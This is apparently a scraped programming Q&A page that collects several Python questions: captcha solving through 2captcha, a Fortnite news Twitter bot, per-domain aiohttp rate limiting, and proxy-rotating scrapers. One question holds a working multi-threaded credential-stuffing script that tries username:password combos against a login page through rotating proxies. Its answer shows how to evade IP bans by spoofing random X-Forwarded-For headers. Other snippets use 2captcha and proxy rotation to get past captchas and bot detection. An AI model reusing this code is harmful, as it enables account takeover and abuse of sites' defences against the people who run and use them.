Setting an expiration on a function for a retry - python

I am harvesting captcha, and captcha responses are only good for 2 minutes. I am trying to figure out how to set an "Expired, fetching again" function
def captchaToken():
global captoken
s = requests.Session()
# here we post site key to 2captcha to get captcha ID (and we parse it here too)
captcha_id = s.post("http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(APItoken, sitekey, url)).text.split('|')[1]
#time.sleep(5)
print("Waiting for captcha...")
# then we parse gresponse from 2captcha response
recaptcha_answer = s.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(APItoken, captcha_id)).text
print("Solving captcha...")
while 'CAPCHA_NOT_READY' in recaptcha_answer:
print("Waiting for a response . . .")
time.sleep(2.5)
recaptcha_answer = s.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(APItoken, captcha_id)).text
recaptcha_answer = recaptcha_answer.split('|')[1]
captoken = recaptcha_answer
print(Fore.MAGENTA + "Captcha Response: "+recaptcha_answer)

I'd suggest:
while 1:
captcha = get_captcha()
request = post_captcha(captcha)
start = time.time()
while 1:
response = poll_for_result(request)
if start + 120 < time.time():
time_is_up()
break
if response:
return deal_with_response(response)

Related

How to check if file is already in the cache?

i am working on a Tool which can post Ingame News Updates from Games on your Twitter Account, in the last few Days I searched for an solution to find a way to look if an image is already in the cache so it wont be posted again if a News Feed Update of an Game is online, it should only post the new ones and skip the old ones (actually it posts every active News Feed again), the problem is can't do it. I tested it about 100 Times but it wont work. I really hope that one of you can help me with this issue because it would be fantastic if this Tool would work with an method like this. Thanks for every single help in advance.
Here is my code:
import tweepy
import time
from colorama import *
init()
auth = tweepy.OAuthHandler('API', 'APISECRET')
auth.set_access_token('ACESS', 'ACESSSECRET')
response = requests.get('https://fortnite-api.com/v2/news/br')
newsData = response.json()["data"]
#-----
footer = '#Fortnite'
delay = 5
saveImages = True
#-----
while 1:
response = requests.get('https://fortnite-api.com/v2/news/br')
if response:
newsDataLoop = response.json()["data"]
print("2 - Checking for change in news feed...")
if newsData != newsDataLoop:
#if loop == True:
print("News Feed has changed...")
for i in newsDataLoop["motds"]:
try:
print("Saving: "+i["id"])
url = i["image"]
r = requests.get(url, allow_redirects=True)
open("NewsImages/"+i["id"]+'.png', 'wb').write(r.content)
print("Saved: "+i["id"])
try:
api = tweepy.API(auth)
api.update_with_media("NewsImages/"+i["id"]+'.png',"Fortnite News Update:\n\n"+i["title"]+":\n"+i["body"]+"\n\n"+footer)
print("Tweeted: "+i["id"])
except:
print("Failed to tweet: "+i["id"])
if saveImages == 'False':
os.remove("NewsImages/"+i["id"]+'.png')
response = requests.get('https://fortnite-api.com/v2/news/br')
newsData = response.json()["data"]
except:
print("Error in tweeting news feed: skipping")
print("Finished news feed publishing")
else:
print("FAILED TO GRAB NEWS DATA: URL DOWN")
time.sleep(delay)
You need to check each motd to see if it existed in the old dataset.
import tweepy
import time
from colorama import *
init()
auth = tweepy.OAuthHandler('API', 'APISECRET')
auth.set_access_token('ACESS', 'ACESSSECRET')
response = requests.get('https://fortnite-api.com/v2/news/br')
newsData = response.json()["data"]
#-----
footer = '#Fortnite'
delay = 5
saveImages = True
#-----
while 1:
response = requests.get('https://fortnite-api.com/v2/news/br')
if response:
newsDataLoop = response.json()["data"]
print("2 - Checking for change in news feed...")
if newsData != newsDataLoop:
#if loop == True:
print("News Feed has changed...")
for i in newsDataLoop["motds"]:
if i in newsData["motds"]:
# has already been posted
print("Already posted")
continue
try:
print("Saving: "+i["id"])
url = i["image"]
r = requests.get(url, allow_redirects=True)
open("NewsImages/"+i["id"]+'.png', 'wb').write(r.content)
print("Saved: "+i["id"])
try:
api = tweepy.API(auth)
api.update_with_media("NewsImages/"+i["id"]+'.png',"Fortnite News Update:\n\n"+i["title"]+":\n"+i["body"]+"\n\n"+footer)
print("Tweeted: "+i["id"])
except:
print("Failed to tweet: "+i["id"])
if saveImages == 'False':
os.remove("NewsImages/"+i["id"]+'.png')
response = requests.get('https://fortnite-api.com/v2/news/br')
newsData = response.json()["data"]
except:
print("Error in tweeting news feed: skipping")
print("Finished news feed publishing")
else:
print("FAILED TO GRAB NEWS DATA: URL DOWN")
time.sleep(delay)

How to solve python selenium 2captcha problem?

Here is my code.
while True:
username_box = self.driver.find_element_by_xpath(
'//*[#id="snapname"]')
username_box.send_keys('xxxx')
sleep(2)
age_select = Select(self.driver.find_element_by_id('age'))
age_select.select_by_value(random.choice(age_values))
sleep(2)
gender_select = Select(self.driver.find_element_by_id('gender'))
gender_select.select_by_value('female')
sleep(2)
add_me_btn = self.driver.find_element_by_id('submitBtn')
add_me_btn.click()
try:
logout = self.driver.find_element_by_xpath(
'//*[#id="wrap"]/div[1]/div/div[2]/ul/li/a')
logout.click()
sleep(2)
logout1 = self.driver.find_element_by_xpath(
"//*[#id='wrap']/div[1]/div/div[2]/ul/li/ul/li/a")
logout1.click()
sleep(5)
except:
service_key = 'Service key here'
google_site_key = 'Site key here'
pageurl = 'Page Url Here'
url = "http://2captcha.com/in.php?key=apikeyhere&method=userrecaptcha&googlekey=sitekeyhere&pageurl=pageurlhere"
resp = requests.get(url)
if resp.text[0:2] != 'OK':
quit('Service error. Error Code' + resp.text)
captcha_id = resp.text[3:]
fetch_url = "http://2captcha.com/res.php?key=apikeyhere&action=get&id=" + captcha_id
for i in range(1, 20):
sleep(5)
resp = requests.get(fetch_url)
if resp.text[0:2] == 'OK':
break
print('Time to solve:', time() - start_time)
submit_url = "urlhere"
headers = {
'user-agent': 'Mozilla/5.0 Chrome/52.0.2743.116 Safari/537.36'}
payload = {
'submit': 'submit',
'g-recaptcha-response': resp.text[3:]
}
resp = requests.post(submit_url, headers=headers, data=payload)
I'm trying to solve captcha for a site. I'm using 2captcha for this job. However This code cant solve the captcha. I mean bot working until this column:
print('Time to solve:', time() - start_time)
However after that returning the begining of while loop.What can be wrong with this code?
Have you checked if your captchas were sent to 2captcha? I mean here: https://2captcha.com/statistics/uploads
And what status they have if they are there?

aiohttp: rate limiting requests-per-second by domain

I am writing a web crawler that is running parallel fetches for many different domains. I want to limit the number of requests-per-second that are made to each individual domain, but I do not care about the total number of connections that are open, or the total requests per second that are made across all domains. I want to maximize the number of open connections and requests-per-second overall, while limiting the number of requests-per-second made to individual domains.
All of the currently existing examples I can find either (1) limit the number of open connections or (2) limit the total number of requests-per-second made in the fetch loop. Examples include:
aiohttp: rate limiting parallel requests
aiohttp: set maximum number of requests per second
Neither of them do what I am requesting which is to limit requests-per-second on a per domain basis. The first question only answers how to limit requests-per-second overall. The second one doesn't even have answers to the actual question (the OP asks about requests per second and the answers all talk about limiting # of connections).
Here is the code that I tried, using a simple rate limiter I made for a synchronous version, which doesn't work when the DomainTimer code is run in an async event loop:
from collections import defaultdict
from datetime import datetime, timedelta
import asyncio
import async_timeout
import aiohttp
from urllib.parse import urlparse
from queue import Queue, Empty
from HTMLProcessing import processHTML
import URLFilters
SEED_URLS = ['http://www.bbc.co.uk', 'http://www.news.google.com']
url_queue = Queue()
for u in SEED_URLS:
url_queue.put(u)
# number of pages to download per run of crawlConcurrent()
BATCH_SIZE = 100
DELAY = timedelta(seconds = 1.0) # delay between requests from single domain, in seconds
HTTP_HEADERS = {'Referer': 'http://www.google.com',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0'}
class DomainTimer():
def __init__(self):
self.timer = None
def resetTimer(self):
self.timer = datetime.now()
def delayExceeded(self, delay):
if not self.timer: #We haven't fetched this before
return True
if (datetime.now() - self.timer) >= delay:
return True
else:
return False
crawl_history = defaultdict(dict) # given a URL, when is last time crawled?
domain_timers = defaultdict(DomainTimer)
async def fetch(session, url):
domain = urlparse(url).netloc
print('here fetching ' + url + "\n")
dt = domain_timers[domain]
if dt.delayExceeded(DELAY) or not dt:
with async_timeout.timeout(10):
try:
dt.resetTimer() # reset domain timer
async with session.get(url, headers=HTTP_HEADERS) as response:
if response.status == 200:
crawl_history[url] = datetime.now()
html = await response.text()
return {'url': url, 'html': html}
else:
# log HTTP response, put into crawl_history so
# we don't attempt to fetch again
print(url + " failed with response: " + str(response.status) + "\n")
return {'url': url, 'http_status': response.status}
except aiohttp.ClientConnectionError as e:
print("Connection failed " + str(e))
except aiohttp.ClientPayloadError as e:
print("Recieved bad data from server # " + url + "\n")
else: # Delay hasn't passed yet: skip for now & put # end of q
url_queue.put(url);
return None
async def fetch_all(urls):
"""Launch requests for all web pages."""
tasks = []
async with aiohttp.ClientSession() as session:
for url in urls:
task = asyncio.ensure_future(fetch(session, url))
tasks.append(task) # create list of tasks
return await asyncio.gather(*tasks) # gather task responses
def batch_crawl():
"""Launch requests for all web pages."""
start_time = datetime.now()
# Here we build the list of URLs to crawl for this batch
urls = []
for i in range(BATCH_SIZE):
try:
next_url = url_queue.get_nowait() # get next URL from queue
urls.append(next_url)
except Empty:
print("Processed all items in URL queue.\n")
break;
loop = asyncio.get_event_loop()
asyncio.set_event_loop(loop)
pages = loop.run_until_complete(fetch_all(urls))
crawl_time = (datetime.now() - start_time).seconds
print("Crawl completed. Fetched " + str(len(pages)) + " pages in " + str(crawl_time) + " seconds.\n")
return pages
def parse_html(pages):
""" Parse the HTML for each page downloaded in this batch"""
start_time = datetime.now()
results = {}
for p in pages:
if not p or not p['html']:
print("Received empty page")
continue
else:
url, html = p['url'], p['html']
results[url] = processHTML(html)
processing_time = (datetime.now() - start_time).seconds
print("HTML processing finished. Processed " + str(len(results)) + " pages in " + str(processing_time) + " seconds.\n")
return results
def extract_new_links(results):
"""Extract links from """
# later we could track where links were from here, anchor text, etc,
# and weight queue priority based on that
links = []
for k in results.keys():
new_urls = [l['href'] for l in results[k]['links']]
for u in new_urls:
if u not in crawl_history.keys():
links.append(u)
return links
def filterURLs(urls):
urls = URLFilters.filterDuplicates(urls)
urls = URLFilters.filterBlacklistedDomains(urls)
return urls
def run_batch():
pages = batch_crawl()
results = parse_html(pages)
links = extract_new_links(results)
for l in filterURLs(links):
url_queue.put(l)
return results
There are no errors or exceptions thrown, and the rate-limiting code works fine in for synchronous fetches, but the DomainTimer has no apparent effect when run in async loop. The delay of one request-per-second per domain is not upheld...
How would I modify this synchronous rate limiting code to work within the async event loop? Thanks!
It's hard to debug your code since it contains many unrelated stuff, it's easier to show idea on a new simple example.
Main idea:
write your Semaphore-like class using __aenter__, __aexit__
that accepts url (domain)
use domain-specific Lock to prevent multiple requests to the same domain
sleep before allowing next request according to domain's last request and RPS
track time of last request for each domain
Code:
import asyncio
import aiohttp
from urllib.parse import urlparse
from collections import defaultdict
class Limiter:
# domain -> req/sec:
_limits = {
'httpbin.org': 4,
'eu.httpbin.org': 1,
}
# domain -> it's lock:
_locks = defaultdict(lambda: asyncio.Lock())
# domain -> it's last request time
_times = defaultdict(lambda: 0)
def __init__(self, url):
self._host = urlparse(url).hostname
async def __aenter__(self):
await self._lock
to_wait = self._to_wait_before_request()
print(f'Wait {to_wait} sec before next request to {self._host}')
await asyncio.sleep(to_wait)
async def __aexit__(self, *args):
print(f'Request to {self._host} just finished')
self._update_request_time()
self._lock.release()
#property
def _lock(self):
"""Lock that prevents multiple requests to same host."""
return self._locks[self._host]
def _to_wait_before_request(self):
"""What time we need to wait before request to host."""
request_time = self._times[self._host]
request_delay = 1 / self._limits[self._host]
now = asyncio.get_event_loop().time()
to_wait = request_time + request_delay - now
to_wait = max(0, to_wait)
return to_wait
def _update_request_time(self):
now = asyncio.get_event_loop().time()
self._times[self._host] = now
# request that uses Limiter instead of Semaphore:
async def get(url):
async with Limiter(url):
async with aiohttp.ClientSession() as session: # TODO reuse session for different requests.
async with session.get(url) as resp:
return await resp.text()
# main:
async def main():
coros = [
get('http://httpbin.org/get'),
get('http://httpbin.org/get'),
get('http://httpbin.org/get'),
get('http://httpbin.org/get'),
get('http://httpbin.org/get'),
get('http://eu.httpbin.org/get'),
get('http://eu.httpbin.org/get'),
get('http://eu.httpbin.org/get'),
get('http://eu.httpbin.org/get'),
get('http://eu.httpbin.org/get'),
]
await asyncio.gather(*coros)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(main())
finally:
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
I developed a library named octopus-api (https://pypi.org/project/octopus-api/), that enables you to rate limit and set the number of connections to the endpoint using aiohttp under the hood. The goal of it is to simplify all the aiohttp setup needed.
Here is an example of how to use it, where the get_ethereum is the user-defined request function. It could have also been a web crawler function request or what ever fits:
from octopus_api import TentacleSession, OctopusApi
from typing import Dict, List
if __name__ == '__main__':
async def get_ethereum(session: TentacleSession, request: Dict):
async with session.get(url=request["url"], params=request["params"]) as response:
body = await response.json()
return body
client = OctopusApi(rate=50, resolution="sec", connections=6)
result: List = client.execute(requests_list=[{
"url": "https://api.pro.coinbase.com/products/ETH-EUR/candles?granularity=900&start=2021-12-04T00:00:00Z&end=2021-12-04T00:00:00Z",
"params": {}}] * 1000, func=get_ethereum)
print(result)
The TentacleSession works the same as how you write POST, GET, PUT and PATCH for aiohttp.ClientSession.
Let me know if it helps your issue related to rate limits and connection for crawling.

Sending Asynchronous requests with Python requests library

As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.
I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])

Python: parallel loop

I have dataframe and column
event_time
avito.ru/morozovsk/avtomobili/honda_accord_1998_799656153
avito.ru/donetck/avtomobili/honda_accord_2000_829068734
avito.ru/taganrog/avtomobili/volkswagen_passat_1997_839237476
avito.ru/volgodonsk/avtomobili/volkswagen_golf_1993_657720225
avito.ru/taganrog/avtomobili/peugeot_206_2008_818743294
avito.ru/bataysk/avtomobili/peugeot_206_2002_825498743
and I need to open html page. I use proxy and use code
for url in urls:
m = re.search(r'avito.ru\/[a-z]+\/avtomobili\/[a-z0-9_]+$', url)
if m is not None:
url = 'https://www.' + url
proxy = pd.read_excel('proxies.xlsx')
proxies = proxy.proxy.values.tolist()
for i, proxy in enumerate(proxies):
# print "Trying HTTP proxy %s" % proxy
try:
result = urllib.urlopen(url, proxies={'http': proxy}).read()
if 'Мы обнаружили, что запросы, поступающие с вашего IP-адреса, похожи на автоматические' in result:
raise Exception
else:
page = page.read()
soup = BeautifulSoup(page, 'html.parser')
price = soup.find('span', itemprop="price")
print price
except:
print "Trying next proxy %s in 30 seconds" % proxy
time.sleep(30)
But it need a lot of time! I want to do it faster.
I try to add this code to func
def get_page(url):
and next
if __name__ == '__main__':
pool = Pool(processes=8)
pool.map(get_page, urls)
I want to open some url with some proxy, but it works wrong for me.
Is any way to solve my task?

Categories

Resources